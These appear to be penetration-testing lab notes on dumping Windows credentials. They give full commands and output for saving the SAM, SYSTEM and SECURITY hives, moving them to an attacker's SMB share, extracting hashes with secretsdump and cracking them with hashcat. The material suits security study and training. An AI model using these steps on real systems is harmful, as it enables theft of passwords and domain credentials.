Registry hives:

| Registry Hive | Description |
|---|---|
| HKLM\SAM | Contains the password hashes (NT, and LM where still stored) for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords, or used directly for pass-the-hash. |
| HKLM\SYSTEM | Stores the system boot key (syskey), from which the key that encrypts the SAM hashes is derived. Without it the SAM hashes cannot be decrypted, so SAM and SYSTEM must always be taken together. |
| HKLM\SECURITY | Contains sensitive information used by the Local Security Authority (LSA): cached domain credentials (DCC2), LSA secrets (which can include cleartext service-account passwords), DPAPI keys, and more. |
The hives can be backed up with the reg.exe utility. This has to be done from an elevated (administrator) prompt, since saving these hives requires administrative rights; a standard user gets "Access is denied".
Example:
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
On the attacking host, start an SMB share with Impacket's smbserver.py (here the local directory /home/ltnbob/Documents/ is exposed as the share CompData; -smb2support is needed for modern Windows clients, which refuse SMB1):
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
Then, on the target, move the saved hive files to that share (10.10.15.16 is the attacking host):
C:\> move sam.save \\10.10.15.16\CompData
1 file(s) moved.
C:\> move security.save \\10.10.15.16\CompData
1 file(s) moved.
C:\> move system.save \\10.10.15.16\CompData
1 file(s) moved.
To dump the hashes offline with secretsdump.py (the LOCAL target tells it to parse the saved hive files instead of connecting to a remote host):
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
The NT hashes from the SAM can then be cracked with hashcat mode -m 1000 (pass --username if the input file keeps the user:hash form).
hklm\security also contains cached domain logon information in the form of DCC2 (MS Cache v2) hashes, which secretsdump prints as $DCC2$10240#user#hash and which hashcat cracks with -m 2100. Because DCC2 is PBKDF2 with 10240 iterations, these crack far more slowly than NT hashes, so prioritise the NT hashes first.